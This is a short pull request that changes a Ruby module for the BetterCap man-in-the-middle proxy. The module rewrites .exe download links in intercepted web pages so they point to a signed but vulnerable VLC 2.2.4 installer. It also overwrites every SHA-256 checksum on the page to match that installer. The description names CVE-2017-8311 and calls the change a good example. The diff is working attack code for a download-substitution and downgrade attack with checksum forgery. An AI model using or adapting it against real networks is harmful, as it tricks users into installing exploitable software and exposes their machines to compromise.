### PR TITLE
Armed with VLC version 2.2.4

### DIFF
--- a/exploit_vlc.rb
+++ b/exploit_vlc.rb
@@ -14,8 +14,8 @@ class VLCExploit < BetterCap::Proxy::HTTP::Module
 		# is it a html page?
 		if response.content_type =~ /^text\/html.*/
 			BetterCap::Logger.info "Exploit http://#{request.host}#{request.path}..".green
-			response.body.gsub! %r/["']http:\/\/*[^\s]+\.(exe)["']/i, "http://example.org/malware.exr"
-			response.body.gsub! /[a-f0-9]{64}/i, "fake_checksum_here"
+			response.body.gsub! %r/["']http:\/\/*[^\s]+\.(exe)["']/i, "http://mirror.vorboss.net/videolan/vlc/2.2.4/win32/vlc-2.2.4-win32.exe"
+			response.body.gsub! /[a-f0-9]{64}/i, "f4a4b8897e86f52a319ee4568e62be9cda1bcb2341e798da12e359d81cb36e51"
 		end
 	end
 end


### PR DESCRIPTION
VLC version 2.2.4 is vulnerable to **CVE-2017-8311** and signed by VLC.

I don’t suggest merging this PR, but I think it makes a good example.